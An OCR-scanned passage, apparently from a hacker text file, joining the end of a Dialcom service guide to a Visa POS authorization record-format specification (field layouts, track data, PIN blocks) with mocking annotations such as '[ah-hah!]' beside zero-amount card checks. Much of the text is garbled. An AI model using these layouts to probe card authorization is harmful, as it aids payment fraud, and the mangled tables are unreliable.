to show, add, delete, and alter your rules for choosing news. The rules 
are made using words or phrases, logical operators, wildcards and 
minimal punctuation. A rule can be as simple as "HACKING", which will 


get every newswire with the word "hacking" in it mailed to you, or 

if you want to be more selective, "NASA HACKING". Logical operators 
are either AND or OR. For example, "HACKING AND INTERNET". Wildcards 
are either ’*’ or ’?’ (both function as the same). They simple replace 


any number of letters. Punctuation is permitted for initials, 
abbreviations, apostrophes or hyphens, but not for question marks and 
Similar. All of this is explained in the NEWSTAB service itself. 


For the file hungry, Dialcom offers several file transfer programs, 
including KERMIT and Dialcom’s FT, which implements most popular 
protocols, like Zmodem, Xmodem, etc. 


A small number of other fun things to try: 


NET-TALK The ‘‘interactive computer conferencing system’’ -- build 
your private IRC! 


CRYPTO Dialcom’s encryption program. Something they’re probably 
going to love on sci.crypt. 


NUSAGI 


Gl 


By far one of the better things to do on Dialcom, it was 
left out of this file because it is simply huge. This 
program allows the user (typically an administrator) to 
monitor network usage, sort the data, store it, peek 
into all the little details (virtual connection types, 
remote/local addresses, actions, time, commands, etc). 
Unfortunately, it’s completely beyond the scope of this 
file, as there are tons of switches and options to use 
in order to put this program to effective us 
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EXTERNAL INTERFACE SPECIFICATION 


SECOND GENERATION 
AUTHORIZATION RECORD FORMATS 


For Record Formats 


J - PS/2000 REPS 
G - VisaNet Dial Debit 


1.0 INTRODUCTION 
2.0 APPLICABLE DOCUMENTS 
2.01 RELATED VISA DOCUMENTS FOR AUTHORIZATION 
2.02 RELATED VISA DOCUMENTS FOR DATA CAPTURE 
3.0 AUTHORIZATION RECORD FORMATS 
3.01 REQUEST RECORD FORMA 
3.02 RESPONSE RECORD FORMAT 
4.0 REQUEST RECORD DATA ELEMENT DEFINITIONS 
4.01 RECORD FORMA 
4.02 APPLICATION TYPE 
4.03 MESSAGE DELIMITER 
4.04 ACQUIRER BIN 
4.05 MERCHANT NUMBER 
4.06 STORE NUMBER 
4.07 TERMINAL NUMBER 
4.08 MERCHANT CATEGORY CODE 
4.09 MERCHANT COUNTRY CODE 
4.10 MERCHANT CITY CODE 
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4.11 TIME ZONE DIFFERENTIAL 
4.12 AUTHORIZATION TRANSACTION CODE 
4.13 TERMINAL IDENTIFICATION NUMBER 
4.14 PAYMENT SERVICE INDICATOR 
4.15 TRANSACTION SEQUENCE NUMBER 
4.16 CARDHOLDER IDENTIFICATION DATA 
4.17 ACCOUNT DATA SOURCE 
4.18 CUSTOMER DATA FIELD 
4.18.1 TRACK 1 READ DATA 
4.18.2 TRACK 2 READ DATA 
4.18.3 MANUALLY ENTERED ACCOUNT DATA (CREDIT CARD) 
4.18.3.1 MANUALLY ENTERED ACCOUNT NUMBER 
4.18.3.2 MANUALLY ENTERED EXPIRATION DATE 
4.18.4 CHECK ACCEPTANCE IDENTIFICATION NUMBER 
4.18.4.1 CHECK ACCEPTANCE ID 
4.18.4.2 MANUALLY ENTERED CHECK ACCEPTANCE DATA 
4.19 FIELD SEPARATOR 
4.20 CARDHOLDER IDENTIFICATION DATA 
4.20.1 STATIC KEY WITH TWENTY THREE BYTE CARDHOLDER ID 
4.20.2 STATIC KEY WITH THIRTY TWO BYTE CARDHOLDER ID 
4.20.3 DUK/PT KEY WITH THIRTY TWO BYTE CARDHOLDER ID 
4.20.4 ADDRESS VERIFICATION SERVICE DESCRIPTION [hmmm... ] 
4.21 FIELD SEPARATOR 
4.22 TRANSACTION AMOUNT 
4.23 FIELD SEPARATOR 
4.24 DEVICE CODE/INDUSTRY CODE 
4.25 FIELD SEPARATOR 
4.26 ISSUING INSTITUTION ID/RECEIVING INSTITUTION ID 
4.27 FIELD SEPARATOR 
4.28 SECONDARY AMOUNT (CASHBACK) 
4.29 FIELD SEPARATOR 
4.30 MERCHANT NAME 
4.31 MERCHANT CITY 
4.32 MERCHANT STATE 
4.33 SHARING GROUP 
4.34 FIELD SEPARATOR 
4.35 MERCHANT ABA NUMBER 
4.36 MERCHANT SETTLEMENT AGENT NUMBER 
4.37 FIELD SEPARATOR 
4.38 AGENT NUMBER 
4.39 CHAIN NUMBER 
4.40 BATCH NUMBER 
4.41 REIMBURSEMENT ATTRIBUTE 
4.42 FIELD SEPARATOR 
4.43 APPROVAL CODE 
4.44 SETTLEMENT DATE 
4.45 LOCAL TRANSACTION DATE 
4.46 LOCAL TRANSACTION TIME 
4.47 SYSTEM TRACE AUDIT NUMBER 
4.48 ORIGINAL AUTHORIZATION TRANSACTION CODE 
4.49 NETWORK IDENTIFICATION CODE 
4.50 FIELD SEPARATOR 
5.0 RESPONSE RECORD DATA ELEMENT DEFINITIONS 
5.01 PAYMENT SERVICE INDICATOR 
5.02 STORE NUMBER 
5.03 TERMINAL NUMBER 
5.04 AUTHORIZATION SOURCE CODE 
5.05 TRANSACTION SEQUENCE NUMBER 
5.06 RESPONSE CODE 
5.07 APPROVAL CODE 
5.08 LOCAL TRANSACTION DATE 
5.09 AUTHORIZATION RESPONSE CODE 
5.10 AVS RESULT CODE 
5.11 TRANSACTION IDENTIFIER 
5.12 FIELD SEPARATOR 
5.13 VALIDATION CODE 
5.14 FIELD SEPARATOR 


5.15 NETWORK IDENTIFICATION CODE 
5.16 SETTLEMENT DATE 

5.17 SYSTEM TRACE AUDIT NUMBER 
5.18 RETRIEVAL REFERENCE NUMBER 
5.19 LOCAL TRANSACTION TIME 


6.0 CONFIRMATION RECORD DATA ELEMEN 
6.01 NETWORK IDENTIFICATION COD 
6.02 SETTLEMENT DATE 
6.03 SYSTEM TRACE AUDIT NUMB 


T DEFINITIONS 


E 
Ww 


7.0 CHARACTER CODE DEFINITIONS 


7.01 TRACK 1 CHARACTER DEFINITION 
7.02 TRACK 2 CHARACTER DEFINITION 
7.03 AUTHORIZATION MESSAGE CHARACTER SET 
7.04 CHARACTER CONVERSION SUMMARY 
7.05 ACCOUNT DATA LUHN CHECK 
7.06 CALCULATING AN LRC 
7.07 TEST DATA FOR RECORD FORMAT "J" 
7.07.1 TEST DATA FOR A FORMAT "J" AUTHORIZATION REQUEST 


7.07.2 RESPONSE MESSAGE FOR TEST DATA 


1.0 INTRODUCTION 


This document describes the request and response record formats for the VisaNet 
second generation Point-Of-Sale (POS) authorization terminals and VisaNet 
Authorization services. This document describes only record formats. Other 
documents describe communication protocols and POS equipment processing 
requirements. Figure 1.0 represents the authorization request which is 
transmitted to VisaNet using public communication services and the 
authorization response returned by VisaNet. Debit transactions include a 

third confirmation message. 


POS DEVICE VISANET 
AUTHORIZATION 
REQUEST 
| TRANSMITTED TO A 
_———— > VISANET AUTHORIZATION 
AUTHORIZATION RESPONSE 
HOST SYSTEM | 


RETURNED BY THE | 
VISANET* HOST SLO" "qs =>Ss== | 
THE POS TERMINAL 


DEBIT RESPONSE 


CONF IRMATION >TRANSMITTED TO 
HOST SYSTEM 
FIGURE 1.0 


Authorization request and response. 


This document describes the record formats to be used for the development of 
new applications. Current formats or transition formats will be provided on 
request. The usage of some fields have changed with the new record formats. 
Applications which were developed to previous specifications will continue to 
be supported by VisaNet services. The new formats and field usage is provided 
with the intention of moving all new applications developed to the new formats. 


2.0 APPLICABLE DOCUMENTS 


The following documents provide additional definitions and background. 


2.01 RELATED VISA DOCUMENTS FOR AUTHORIZATION 
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1. EIS1051 - External Interface Specification 
Second Generation 
Authorization Link Level Protocol 


2.02 RELATED VISA DOCUMENTS FOR DATA CAPTUR 


E 


1. EIS1081 - External Interface Specification 
Second Generation 
Data Capture Record Formats 


2. EIS1052 - External Interface Specification 
Second Generation 
Data Capture Link Level Protocol 


3.0 AUTHORIZATION RECORD FORMATS 


This section contains the record formats for the authorization request, 
response and confirmation records. The ANSI X3.4 character set is used to 
represent all record data elements. (See Section 7) 


In the record formats on the following pages, the column heading FORMAT is 
defined as: 


"NUM" represents numeric data, the numbers 0 through 9, NO SPACES. 

"A/N" represents alphanumeric data, the printing character set. 

WES! represents a field separator character as defined in ANSI X3.4 as 
a "1C" hex 


3.01 REQUEST RECORD FORMAT 


Table 3.01b provides the record format for the authorization request records. 
Section 4 provides the data element definitions. 


The authorization request record is a variable length record. The record 
length will depend on the source of the customer data and the type of 
authorization request. Refer to Table 3.0lc to determine which GROUPS to use 
from Table 3.0la 


ABLE 3.0la IS PROVIDED FOR REFERENCE REASONS ONLY. ALL NEW APPLICATIONS 
SHOULD USE ONE OF THE FOLLOWING RECORD FORMATS: 
RECORD | APPLICATION | 
FORMAT | TYPE | REMARKS 
J | CREDI | All non-ATM card transactions (Visa cards, other credit 
| | cards, private label credit cards and check guarantee) 
G | DIAL DEBIT | Visa supported ATM debit cards 


The selection of format type J and G or any other value from Table 3.0la will 
depend on the VisaNet services that are desired. Contact your Visa POS member 
support representative for assistance in determining the required formats. 


TABLE 3.0la 
Record Format Summary 


Non-CVV CVV Terminal 
Compliant Compliant Generation Description 
0 RESERVED 
i N First Vutran 
2 8 First Sweda 
4 R First Verifone 
6 P First Amex 
7 3 First Racal 
A Q First DMC 
B R First GTE & Omron [velly intelestink] 
Cc 9 First Taltek 
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iS) U First Datatrol - Standard Oil 
D T First Datatrol 
E RESERVED 
iS) EF Second Non-REPS-Phase 1 CVV 
G Second Dial Debit 
H Second Non-REPS-Phase 2 CVV 
aE Second RESERVED — Non-REPS Controller 
J Second REPS — Terminal & Controller 
K Second RESERVED 
L Second RESERVED — Leased VAP 
M Second RESERVED — Member Format 
N-O RESERVED 
V-Y RESERVED 
Z Second RESERVED —- SDLC Direct [hmmm] 
TABLE 3.01b 


Second Generation Authorization Request Record Format 


see 
Group Byte# Length Format Name section 
1 1 A/N Record Format 4.01 
2 1 A/N Application Type 4.02 
3 1 A/N Message Delimiter 4.03 
4-9 6 NUM Acquirer Bin 4.04 
10-21 12 NUM Merchant Number 4.05 
22=25 4 NUM Store Number 4.06 
26-29 4 NUM Terminal Number 4.07 
30=33 4 NUM Merchant Category Code 4.08 
34-36 3 NUM Merchant Country Code 4.09 
37-41 5 A/N Merchant City Code (ZIP in the U.S.) 4.10 
42-44 3 NUM Time Zone Differential 4.11 
45-46 2 A/N Authorization Transaction Code 4.12 
47-54 8 NUM Terminal Identification Number 4.13 
55 1 A/N Payment Service Indicator 4.14 
56-59 4 NUM Transaction Sequence Number 4.15 
60 A/N Cardholder Identification Code 4.16 
61 A/N Account Data Field 4.17 
Variable 1-76 Customer Data Field 4.18. 
(See: DEFINITIONS in Table 3.01d) 
Variable 1 LES" Field Separator 4.19 
Variable 0-32 A/N Cardholder Identification Data 4.20 
Variable 1 "ES" Field Separator 421 
Variable 3-12 NUM Transaction Amount 4.22 
Variable 1 TES" Field Separator 4223 
Variable 2 A/N Device Code/Industry Code 4.24 
Variable 1 whoo Field Separator 4.25 
Variable 0-6 NUM Issuing/Receiving Institution ID 4.26 
I Variable 1 TES" Field Separator 4.27 
Variable 3-12 NUM Secondary Amount (Cashback) 4.28 
II Variable A wee Field Separator 4.29 
Variable 25 A/N Merchant Name 4.30 
Variable 13 A/N Merchant City 4.31 
Variable 2 A/N Merchant State 4.33 
Variable 1-14 A/N Sharing Group 4.33 
Variable 1 "ES" Field Separator 4.34 
Variable 0-12 NUM Merchant ABA 4.35 
Variable 0-4 NUM Merchant Settlement Agent Number 4.36 
Variable 1 ES® Field Separator 4.37 
Variable 6 NUM Agent Number 4.38 
Variable 6 NUM Chain Number 4.39 
Variable 3 NUM Batch Number 4.40 
Variable 1 A/N Reimbursement Attribute 4.41 
TII Variable il "rs" Field Separator 4.42 
Variable 6 A/N Approval Code 4.43 
Variable 4 NUM Settlement Date (MMDD) 4.44 
Variable 4 NUM Local Transaction Date (MMDD) 4.45 
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46 
.47 
48 
49 
.50 


PPP PD 


s may be 
o 36 


RECORD 
FORMAT 


J 


J 


Variable 6 NUM Local Transaction Time (HHMMSS) 
Variable 6 A/N System Trace Audit Number 
Variable 2 A/N Original Auth. Transaction Code 
Variable 1 A/N Network Identification Code 
IV Variable 1 "HS" Field Separator 
NOTE: The maximum length request can be as long as 290 bytes for an Interlink 
Debit Cancel request (including the STX/ETX/LRC). Since some terminal 
limited to a 256 byte message buffer, the following tips can save up t 
bytes: 
—- Limit fields 4.22 and 4.28 to 7 digits 
- Fields 4.26, 4.35 and 4.36 are not required for a debit request 
- Field 4.33 can be limited to 10 bytes 
TABLE 3.01C 
Legend for GROUP (from Table 3.01b) 
FOR THESE TRANSACTIONS, USE >GROUPS 
Tr. LT. LTE TV 
Check guarantee X 
Non-ATM card transactions (Visa cards, other xX xX 
credit cards, private label credit cards 
Visa supported ATM debit cards: Purchase, Return xX xX Xx 
and Inquiry Request 
Visa supported ATM debit cards: Interlink Cancel xX xX Xx Xx 


Request 
TABLE 3.01d 
Definitions for Customer Data Field (from Table 3.01b) 
Length Format Field Name 
MAGNETICALLY read credit cards (SELECT ONE): 
up to 76 A/N Track 1 Read Data 
up to 37 NUM Track 2 Read Data 
MANUALLY entered credit cards: 
up to 28 NUM Manually Entered Account Number 
1 "rs" Field Separator 
4 NUM Manually Entered Expiration Date (MMYY) 
MACHINE read and MANUALLY entered check acceptance requests: 
1 to 28 A/N Check Acceptance ID 
1 "ES" Field Separator 
30-6 A/N Manually Entered Check Acceptance Data 
MAGNETICALLY read ATM debit cards: 
up to 37 NUM Track 2 Read Data 
3.02 RESPONSE RECORD FORMAT 


Sectio 


The authorization response record is variable length for record formats 


4.18.3.1 


4.18.3.2 


4.18.2 


Table 3.02a provides the record format for the authorization response records. 
n 5 provides the data element definitions. 


W wt & 


"6G". Refer to Table 3.02b to determine which GROUPS to use from Table 3.02a. 
Table 3.02a 
Second Generation Authorization Response Record 
see 
Group Byte# Length Format Name section 
1 1 A/N Payment Service Indicator 5.01 
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2-5 
6-9 

10 
114 
15-16 
17-22 
23-28 
29-44 16 
45 1 
Variable 0/15 
Variable 1 
Variable 0/4 
I Variable 


DAN AH Won 


Variable 
Variable 4 
Variable 6 
Variable 12 
II Variable 6 


FOR THESE TRANSACTI 


All non-ATM card tr 


NUM Store Number 

NUM Terminal Number 

A/N Authorization Source Code 

NUM Transaction Sequence Number 

A/N Response Code 

A/N Approval Code 

NUM Local Transaction Date (MMDDYY) 

A/N Authorization Response Messag 

A/N AVS Result Code 

NUM Transaction Identifier 

"rs" Field Separator 

A/N Validation Code 

“ES! Field Separator 

A/N Network Identification Code 

NUM Settlement Date (MMDD) 

A/N System Trace Audit Number 

A/N Retrieval Reference Number 

NUM Local Transaction Time (HHMMSS) 
Table 3.02b 


Legend for GROUP (from Table 3.02a) 


cards, private labe 


Visa supported ATM 
Request and Interli 


ONS, USE >GROUPS 
I It 

ansactions (Visa cards, other credit X 

1 credit cards and check guarantee) 

debit cards: Purchase, Return, Inquiry Xx Xx 


nk Cancel Request 


3.03 CONFIRMATION RECORD FORMAT (ATM DEBIT ONLY) 


The debit respons 


confirmation record. 


AannnInrwnrnnrwnnnanon ooo uo 


OMDAIAHDAAWNE 


RECORD 
FORMAT 


J 


confirmation record is a fixed length record. 


TABLE 3.03 


Second Generation Debit Response Confirmation Record 


Table 3.03 provides the record format for the second generation debit respons 
Section 6 provides the data element definitions. 


see 
Group Byte# Length Format Name section 
1 1 A/N Network ID Code 6.01 
2-5 4 NUM Settlement Date (MMDD) 6.02 
I 6-11 6 A/N System Trace Audit Number 6.03 


4.0 REQUEST RECORD DATA ELEMENT DEFINITIONS 


The following subse 
elements. 


4.01 RECORD FORMAT 


There are several m 


ctions will define the authorization request record data 


ssage formats defined within the VisaNet systems. 


The 


second generation authorization format is specified by placing one of the 


defined values in the record format field. 


of the current form 


ats. 


TABLE 4.01 


VisaNet Authorization Record Format Designators 


RECORD FORMAT 


RECORD DESCRIPTION 


Table 4.01 provides a brief summary 


J 


G 


All non-ATM card transactions (Visa cards, other credit 
cards, private label credit cards and check guarantee) 


Visa supported ATM debit cards 
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4.02 APPLICATION TYP! 


GJ 


The VisaNet authorization system supports multiple application types ranging 
from single thread first generation authorization to interleaved leased lin 
authorization processing. Table 4.02 provides a summary of application type. 


ABLE 4.02 
VisaNet Application Designators 


APPLICATION USE WITH 
TYPE APPLICATION DESCRIPTION REC. FMT 
0 Single authorization per connection J and G 
2 Multiple authorizations per connection J and G 
single-threaded 
4 Multiple authorizations per connect, J 
interleaved 
6 Reserved for future use --- 
8 Reserved for future use ama 
ar Peo Pay Reserved for VisaNet Central Data Capture (CDC) -—-- 
9 Reserved for VisaNet Down Line Load —— 
A-Z Reserved for future use + 
4.03 MESSAGE DELIMITER 


The message delimiter separates the format and application type designators from 
the body of the message. The message delimiter is defined as a "." (period) 


4.04 ACQUIRER BIN 


This field contains the Visa assigned six-digit Bank Identification Number (BIN) 
The acquirer BIN identifies the merchant signing member that signed the merchant 
using the terminal. 


NOT 


cal 


The merchant receives this number from their signing member. 


4.05 MERCHANT NUMBER 


This field contains a NON-ZERO twelve digit number, assigned by the signing 
member and/or the merchant, to identify the merchant within the member systems. 
The combined Acquirer BIN and Merchant Number are required to identify the 
merchant within the VisaNet systems. 


4.06 STORE NUMBER 


This field contains a NON-ZERO four-digit number assigned by the signing member 
and/or the merchant to identify the merchant store within the member systems. 
The combined Acquirer BIN, Merchant Number, and Store Number are required to 
identify the store within the VisaNet systems. 


4.07 TERMINAL NUMBER 


This field contains a NON-ZERO four-digit number assigned by the signing member 
and/or the merchant to identify the merchant store within the member systems. 
This field can be used by systems which use controllers and/or concentrators to 
identify the devices attached to the controllers and/or concentrators. 


4.08 MERCHANT CATEGORY COD 


Gl 


This field contains a four-digit number assigned by the signing member from a 
list of category codes defined in the VisaNet Merchant Data Standards Handbook 
to identify the merchant type. 


4.09 MERCHANT COUNTRY COD 


GI 


This field contains a three-digit number assigned by the signing member from a 
list of country codes defined in the VisaNet V.I.P. System Message Format 
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Manuals to identify the merchant location country. 


4.10 MERCHANT CITY COD 


location. 
address 
field wil 


[This field 


of 


1 


contains 
Within t 
the stor 
be assig 


al 


a five character code used to further identify the merchant 
he United States, the give high order zip code digits of the 
e location are used. Outside of the United States, this 
ned by the signing member. 


4.11 TIME 


G 


G 


ZONE DIFE 


ER 


ENTIAL 


This fie 


ld co 
the VisaNet authorization system. 
providing the local tim 
first two digits specify the magnitude of the differential. 


ntains 


local time within 
It is calculated by the signing member, 
differential from Greenwich Mean Time (GMT). The 
Table 4.11 provides 


a three-digit code used to calculate the 


zon 


a brief summary of the Time Zone Differential codes. 
TABLE 4.11 
Time Zone Differential Code Format 
Byte # Length Format Contents 
1 1 NUMERIC DIRECTION 

0 = Positive, Local Ahead of GMT, 
offset in hours 

1 = Negative, Local Time behind GMT, 
offset in hours 

2 = Positive, offset in 15 minute 
increments 

3 = Negative, offset in 15 minute 
increments 

4 = Positive, offset in 15 minute 
increments, participating in 
daylight savings time 

5 = Negative, offset in 15 minute 
increments, participating in 
daylight savings time 

6-9 = INVALID CODES 
2-3 2 NUMERIC MAGNITUDE 
For Byte #1 = 0 or 1 
Q <= MAGNITUDE <= 12 
For Byte #1 = 2 through 5 
Q <= MAGNITUDE <= 48 


A code of 108 indicates the local 


GMT. 


4.12 AUTHORIZATION TRANSACTION COD 


Pacific Standard time which is 8 hours behind 


GJ 


This field contains a two-character code defined by VisaNet and generated by the 


terminal identifying the type of transaction for which the authorization is 
requested. Table 4.12 provides a summary of the transaction codes. 
TABLE 4.12 
Authorization Transaction Codes 

TRAN 
CODE TRANSACTION DESCRIPTION 
54 Purchase 
39 Cash Advance 
56 Mail/Telephone Order 
57 Quasi Cash 
58 Card Authentication - Transaction Amt & Secondary Amt must equal 

$0.00, AVS may be requested [ah-hah! ] 
64 Repeat: Purchase 
65 Repeat: Cash Advance 
66 Repeat: Mail/Telephone Order (MO/TO) 
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67 Repeat: Quasi Cash 

68 Repeat: Card Authentication - Transaction Amt & Secondary Amt must 
equal $0.00, AVS may be requested 

70 Check guarantee, must include RIID (field 4.26) 

81 Proprietary Card 

84 Private Label Purchase 

85 Private Label, Cash Advance 

86 Private Label Mail/Telephone Order (MO/TO) 

87 Private Label Quasi Cash 

88 Private Label Card Authentication - Transaction Amt & Secondary Amt 
must equal $0.00, AVS may be requested 

93 Debit Purchase 

94 Debit Return 

95 Interlink Debit Cancel (see NOTE below) 


NOTE (for TRANSACTION CODE = 95) 


— For Interlink Debit CANCEL request message, all of the fields in 
Groups I and II will come from the original transaction request or the 
original transaction response, with the exception of the following: 

— The AUTHORIZATION TRANSACTION CODE will need to be changed to the 

Debit CANCEL code. 

— The TRANSACTION SEQUENCE NUMBER should be incremented in the 

normal fashion. 


— The CUSTOMER DATA FIELD and the CARDHOLDER IDENTIFICATION DAT 
(PIN) will need to be re-entered. 


13 


4.13 TERMINAL IDENTIFICATION NUMBER 


This field contains an eight-digit code that must be greater than zero, defined 
by the terminal down line load support organization. Support may be provided by 
the Visa’s Merchant Assistance Center (MAC), the signing member, or a third 
party organization. The terminal ID is used to uniquely identify the terminal 
in the terminal support system and identification for the VisaNet Central Data 
Capture (CDC). The terminal ID may not be unique within the VisaNet system. 
Each terminal support provider and member that provides its own terminal support 
can assign potentially identical terminal IDs within its system. The terminal 
ID can be used by the terminal down line load system to access the terminal 
application and parameter data from a system data base when down line loading a 
terminal. [huh?] 


NOTE: It is recommended that [the] Terminal ID Number should be unique within 
the same Acquirer’s BIN. 


4.14 PAYMENT SERVICE INDICATOR 


This is a one-character field used to indicate a request for REPS qualification. 
Table 4.14 provides a summary of the codes. 


TABLE 4.14 
Payment Service Indicator Codes 


RECORD 
FORMAT VALUE DESCRIPTION 
J Y Yes 
J N No 
G Y Yes 
G N No 


[repetitive? you bet] 


4.15 TRANSACTION SEQUENCE NUMBER 


This field contains a four-digit code which is generated by the terminal as the 
sequence number for the transaction. The sequence number is used by the 
terminal to match request and response messages. This field is returned by 
VisaNet without sequence verification. The sequence number is incremented with 
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wrap from 9999 to OOO1. 


4.16 CARDHOLDER IDENTIFICATION COD 


GJ 


This one-character field contains a code that indicates the method used to 


identify the cardholder. 


Table 4.16 provides a summary of the codes. 


TABLE 4.16 


Cardholder Identification Codes 


ID CODE IDENTIFICATION METHOD 

A Personal Identification Number-23 byte static key (non-USA) fnord 
B PIN at Automated Dispensing Machine - 32 byte static key 
Cc Self Svc Limited Amount Terminal (No ID method available) 
D Self-Service Terminal (No ID method available) 
E Automated Gas Pump (No ID method available) 
K Personal Identification Number - 32 byte DUK/PT 

N Customer Address via Address Verification Service (AVS) 

S Personal Identification Number - 32 byte static key 

vA Cardholder Signature - Terminal has a PIN pad 

@ Cardholder Signature - No PIN pad available 

F-J,L,M,O-R Reserved for future use 

Le 


4.17 ACCOUNT DATA SOURC 


GJ 


ACCOUNT DATA 


This field contains a one-character code defined by Visa and generated by the 
terminal to indicate the source of the customer data entered in field 4.18. 
Table 4.17 provides a summary of codes 


TABLE 4.17 
Account Data Source Codes 


SOURCE CODE ACCOUNT DATA SOURCE CODE DESCRIPTION 


ESERVED 
E SERVED 


ESERVED 
ESERVED 
Manually 


@QxHDAODUWY 


y 
Manually 
ED 


Bar-code read 
- OCR read 


ag-stripe read, Track 2 
ag-stripe read, Track 1 


—- Manually keyed, bar-code capable terminal 

- Manually keyed, OCR capable terminal 

keyed, Track 2 capable 

keyed, Track 1 capable 

keyed, terminal has no card reading capability 
for future use 


correct value of "D" 


- If a dual track reading terminal is being used, be sure to enter th 


or "H" for the magnetic data that is transmitted 


—- When data is manually keyed at a dual track reading terminal, enter either 


a wow or an my 


4.18 CUSTOMER DATA FIELD 


This is a variable length 


field containing customer account or check acceptance 


ID data in one of three formats. The cardholder account information can be read 


d from the card or it may 


be entered manually. Additionally the terminal can be 


used for check authorization processing with the check acceptance identification 
number entered by the operator for transmission in this field. 


NOTE: For all POS terminal 
the following requirement 


ls operated under VISA U.S.A. Operating Regulations, 
must be available as an operating option if the 


merchant location is found to be generating a disproportionately high percentage 


of Suspect Transactions [ 


lets get downright hostile about it] as defined in 
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chapter 9.10 of the VISA U.S.A. Operating Regulations. Specifically, chapter 
9.10.B.2 requires that: 
—- The terminal must read the track data using a magnetic stripe reading 
terminal 
— The terminal must prompt the wage slave to manually enter the last four 
digits of the account number 
—- The terminal must compare the keyed data with the last four digits of the 
account number in the magnetic stripe 

- If the compare is successful, the card is acceptable to continue in the 
authorization process and the terminal must transmit the full, unaltered 
contents of the magnetic stripe in the authorization message. 


- If the compare fails, the card should not be honored at the Point of Sale 


4.18.1 TRACK 1 READ DATA 


This is a variable length field with a maximum data length of 76 characters. 


The track 1 data read from the cardholder’s card is checked for parity and LRC 
errors and then converted from the six-bit characters encoded on the card to 
seven-bit characters as defined in ANSI X3.4. The character set definitions are 
provided in section 7 for reference. As part of the conversion the terminal 
will strip off the starting sentinel, ending sentinel, and LRC characters. The 
separators are to be converted to a "*" (HEX 5E) character. The entire 

track must be provided in the request message. The character set and data 
content are different between track 1 and track 2. The data read by a track 2 
device can not be correctly reformatted and presented as though it were read by 
a track 1 device. [aw shucks] The converted data can not be modified by adding 
or deleting non-framing characters and must be a one-for-one representation of 
the character read from the track. 


4.18.2 TRACK 2 READ DATA 


This is a variable length field with a maximum data length of 37 characters. 


The track 2 data read from the cardholder’s card is checked for parity and LRC 
errors and then converted from the six-bit characters encoded on the card to 
seven-bit characters as defined in ANSI X3.4. The character set definitions are 
provided in section 7 for reference. As part of the conversion the terminal 
will strip off the starting sentinel, ending sentinel, and LRC characters. The 
separators are to be converted to a "*" (HEX 5E) character. The entire 

track must be provided in the request message. The character set and data 
content are different between track 2 and track 1. The data read by a track 1 
device can not be correctly reformatted and presented as though it were read by 


a track 2 device. The converted data can not be modified by adding or deleting 
non-framing characters and must be a one-for-one representation of the character 
read from the track. [repetitive? you bet] 


4.18.3 MANUALLY ENTERED ACCOUNT DATA (CREDIT CARD) 


The customer credit card data may be key entered when the card can not be read, 
when a card is not present, or when a card reader is not available. 


4.18.3.1 MANUALLY ENTERED ACCOUNT NUMBER 


This is a variable length field consisting of 5 to 28 alphanumeric characters. 


The embossed cardholder data, that is key entered, is validated by the terminal 


using rules for each supported card type. For example, both Visa and Master 
Card include a mod 10 check digit as the last digit of the Primary Account 
Number. The Primary Account Number (PAN) is encoded as seven-bit characters 


as defined in ANSI X3.4. The PAN is then provided in the manually entered 
record format provided in Table 3.01lb. The PAN must be provided without 
embedded spaces. 


4.18.3.2 MANUALLY ENTERED EXPIRATION DATE 


This four-digit field contains the card expiration date in the form MMYY (month- 


15.txt Wed Apr 26 09:43:40 2017 


month-year-year) 


4.18.4 CHECK ACCEPTANCE IDENTIFICATION NUMBER 


The customer data may be card read or manually key entered for check acceptance 


transactions. 


4.18.4.1 CHECK ACCEPTANCE ID 


This field is a variable length field consisting of 1 to 28 alphanumeric 


characters. 


validation rules to be used by the terminal. 


two-digit state code and an ID whic 
number. 


4.18.4.2 MANUALLY ENTERED CHECK ACC 


EPTANC 


E DATA 


This six-character field contains t 


the form specified by the check acceptanc 


4.19 FIELD SEPARATOR 


The check acceptance vendor will provide the data format and 
Typically the ID consists of a 
h may be the customer’s drivers license 


he customer birth date or a control code in 


processor. 


The authorization record format specifies the us 


4.20 CARDHOLDER IDENTIFICATION DATA 


of the "FS" character. 


This field will be 0, 23, 29 or 32 characters in length. The cardholder ID 
codes shown in Table 4.16 indicates the type of data in this field. Table 
4.20 provides a brief summary of the current formats. 


TABLE 


4.20 


Cardholder Identification Data Definitions 


CARDHOLDER VALUE (S) FROM 
ID LENGTH DESCRIPTION TABLE 4.16 
0 Signature ID used, No PIN pad is present @,C,D or E 
0 Signature ID used on a terminal with a PIN pad Z 
23 A PIN was entered on a STATIC key PIN pad A 
32 A PIN was entered on a STATIC key PIN pad B 
32 A PIN was entered on a DUK/PT key PIN pad K 
32 A PIN was entered on a STATIC key PIN pad S 
0 to 29 AVS was requested N 
4.20.1 STATIC KEY WITH TWENTY THREE BYTE CARDHOLDER ID 


NOTE: The 23 byte static key technology 


deployed in the Visa U.S.A. region. 


is NOT approved for use in terminals 


[thanks nsa!] 


When a PIN is entered on a PIN pad supporting 23 byte static key technology, the 
terminal will generate the following data: 


1UFxxyyaaaaaaaaaaaaaaaa 


Where: 


1J Header —- PIN was entered 


£ Function Key Indicator - A single byte indicating which, if any, 


function key was pressed on the PIN pad. 


This field is currently 


not edited. Any printable character is allowed. 


XX PIN Block Format - These two numeric bytes indicate the PIN 
encryption method used to create the encrypted PIN block. Visa 
currently supports four methods; O1, 
information, please refer to the VisaNet Standards Manual, Card 

PIN and Security Standards, Section 2, 


Technology Standards, 


Chapter 3, PIN Block Formats 


02, 03, & 04. For more 
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aaaaaaaaaaaaaaaa Expanded Encrypted PIN Block Data - The encrypted 
PIN block format consists of 64 bits of data. Since the VisaNet 
Second Generation protocol allows only printable characters in 
data fields, these 64 bits must b xpanded to ensure that no 


values less than hex "20" are transmitted. 
encrypted PIN block, 
to ANSI X3.4 characters using Table 4.20. 


To expand the 64 bit 


remove four bits at a time and convert them 


After this conversion, 


the 64 bit encrypted PIN block will consist of 16 characters that 
will be placed in the Expanded Encrypted PIN Block Data field. 


4.20.2 STATIC KEY WITH THIRTY TWO BYTE CARDHOLDER ID 


When a PIN is entered on a PIN pad supporting 32 byte static key technology, 
the terminal will generate the following data: 


aaaaaaaaaaaaaaaa2001ppzz00000000 


Where: 


aaaaaaaaaaaaaaaa —- Expanded Encrypted PIN Block Data - The encrypted 
PIN block format consists of 64 bits of data. Since the 

Second Generation protocol allows only printable 

characters in data fields, these 64 bits must be expanded to 


VisaNet 


ensure that no values less than hex "20" 


are transmitted. To 


expand the 64 bit encrypted PIN block, remove four bits at a 
time and convert them to ANSI X3.4 characters using table 4.20. 
After this conversion, the 64 bit encrypted PIN block will 

of 16 characters that will be placed in the Expanded 


consist 


Encrypted PIN Block Data field. 


20 - Security Format Code - This code defines that the Zone 


Encryption security technique was used. 


O01 - PIN Encryption Algorithm Identifier - This code defines that the 


